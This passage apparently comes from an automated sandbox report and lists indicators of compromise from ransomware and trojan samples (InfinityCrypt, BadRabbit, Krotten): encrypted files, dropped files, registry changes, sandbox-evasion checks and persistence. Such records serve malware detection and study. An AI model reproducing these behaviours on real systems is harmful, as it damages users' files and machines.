C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\bdredline.bdch.xml installer.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-environment-l1-1-0.dll Installer.exe File opened for modification C:\Program Files\Bitdefender Agent\26.0.1.231\bdnc.dll installer.exe File opened for modification C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentDP.dll installer.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentUI.exe installer.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\installer\lang\pt-BR.txtui installer.exe File created C:\Program Files\WinRAR\Uninstall.lst winrar-x64-611.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-math-l1-1-0.dll Installer.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\msvcp140.dll Installer.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Dictionaries\en_US\en_US.aff.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-runtime-l1-1-0.dll Installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\concrt140.dll Installer.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ACE.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files\Bitdefender Agent\26.0.1.231\lang\th-TH\bdsubwiz.txtui installer.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\ui\ltr\commoncss.ui installer.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\lang\cs-CZ.txtui installer.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-core-datetime-l1-1-0.dll Installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-core-rtlsupport-l1-1-0.dll Installer.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files\Bitdefender Agent\26.0.1.231\bdnc.ini installer.exe File opened for modification C:\Program Files\Bitdefender Agent\26.0.1.231\lang\es-ES\bdsubwiz.txtui installer.exe File opened for modification C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentService.exe installer.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\skin\images_2\common\close.svg installer.exe File created C:\Program Files\WinRAR\RarExtLogo.altform-unplated_targetsize-48.png winrar-x64-611.exe File opened for modification C:\Program Files\Bitdefender Agent\26.0.1.231\lang\hu-HU\productagentui.txtui installer.exe File created C:\Program Files\Bitdefender Agent\26.0.1.231\lang\ru-RU\productagentui.txtui installer.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-core-errorhandling-l1-1-0.dll Installer.exe File created C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\api-ms-win-crt-conio-l1-1-0.dll Installer.exe File opened for modification C:\Program Files (x86)\Common Files\Adobe\Reader\DC\Linguistics\Providers\Plugins2\AdobeHunspellPlugin\Abbreviations\en_GB\List.txt.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File opened for modification C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\BucketTesting.dll Installer.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\adoberfp.dll.EDD60BD6C2A338FB9608733F75DBAEB119733CE711029424B67F9B3B519A1CF0 Endermanch@InfinityCrypt.exe File created C:\Program Files\Bitdefender Agent\redline\bdredline.conf installer.exe -
Drops file in Windows directory 27 IoCs
Processes:
DrvInst.exeDrvInst.exepnputil.exeDrvInst.exeDrvInst.exesvchost.exepnputil.exepnputil.exerundll32.exesvchost.exeInstaller.exeEndermanch@BadRabbit.exeLogonUI.exepnputil.exeEndermanch@Krotten.exedescription ioc process File opened for modification C:\Windows\inf\oem3.inf DrvInst.exe File opened for modification C:\Windows\inf\oem3.inf DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log pnputil.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File opened for modification C:\Windows\inf\oem2.pnf DrvInst.exe File opened for modification C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\INF\setupapi.dev.log pnputil.exe File opened for modification C:\Windows\INF\setupapi.dev.log pnputil.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\inf\oem3.inf DrvInst.exe File created C:\Windows\cscc.dat rundll32.exe File created C:\Windows\dispci.exe rundll32.exe File opened for modification C:\Windows\6402.tmp rundll32.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\security\logs\scecomp.log Installer.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\inf\oem3.pnf DrvInst.exe File opened for modification C:\Windows\infpub.dat rundll32.exe File created C:\Windows\infpub.dat Endermanch@BadRabbit.exe File created C:\Windows\rescache\_merged\2229298842\4066884077.pri LogonUI.exe File created C:\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\UPnP Device Host\upnphost\udhisapi.dll svchost.exe File opened for modification C:\Windows\INF\setupapi.dev.log pnputil.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\WINDOWS\Web Endermanch@Krotten.exe -
Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exepid process 4784 sc.exe 4360 sc.exe 3208 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 648 2324 WerFault.exe Endermanch@Xyeta.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
pnputil.exesvchost.exeDrvInst.exeDrvInst.exepnputil.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005\ pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Phantom pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Phantom DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs DrvInst.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Phantom DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0014 pnputil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0005 pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Phantom pnputil.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags svchost.exe -
Checks processor information in registry 2 TTPs 10 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
Installer.exeEndermanch@InfinityCrypt.exeProductAgentService.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet Installer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Endermanch@InfinityCrypt.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Endermanch@InfinityCrypt.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 ProductAgentService.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz ProductAgentService.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Installer.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 17 IoCs
Processes:
chrome.exeInstaller.exechrome.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosDate Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily Installer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Bios Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardManufacturer Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardProduct Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Installer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier Installer.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BaseBoardVersion Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BiosVendor Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BiosVersion Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer Installer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Kills process with taskkill 1 IoCs
Processes:
taskkill.exepid process 3332 taskkill.exe -
Modifies Control Panel 6 IoCs
Processes:
Endermanch@Krotten.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginX = "210" Endermanch@Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\WallpaperOriginY = "187" Endermanch@Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop\MenuShowDelay = "9999" Endermanch@Krotten.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International Endermanch@Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\sTimeFormat = "ÕÓÉ" Endermanch@Krotten.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\Desktop Endermanch@Krotten.exe -
Processes:
Endermanch@Krotten.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" Endermanch@Krotten.exe Key created \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Software\Microsoft\Internet Explorer\Main Endermanch@Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window title = ":::::::::::::::::: ÌÎÉ ÕÓÉ ÏÐÎÒÓÕ À ÏÈÇÄÀ ÃÍÈÅÒ ::::::::::::::::::" Endermanch@Krotten.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main Endermanch@Krotten.exe -
Modifies Internet Explorer start page 1 TTPs 2 IoCs
Processes:
Endermanch@Krotten.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" Endermanch@Krotten.exe Set value (str) \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://poetry.rotten.com/lightning/" Endermanch@Krotten.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
ProductAgentService.exeDrvInst.exeDrvInst.exeWatchDog.exeDiscoverySrv.exeProductAgentUI.exeLogonUI.exeDiscoverySrv.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs WatchDog.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates WatchDog.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed ProductAgentService.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs ProductAgentUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DiscoverySrv.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DiscoverySrv.exe Key created 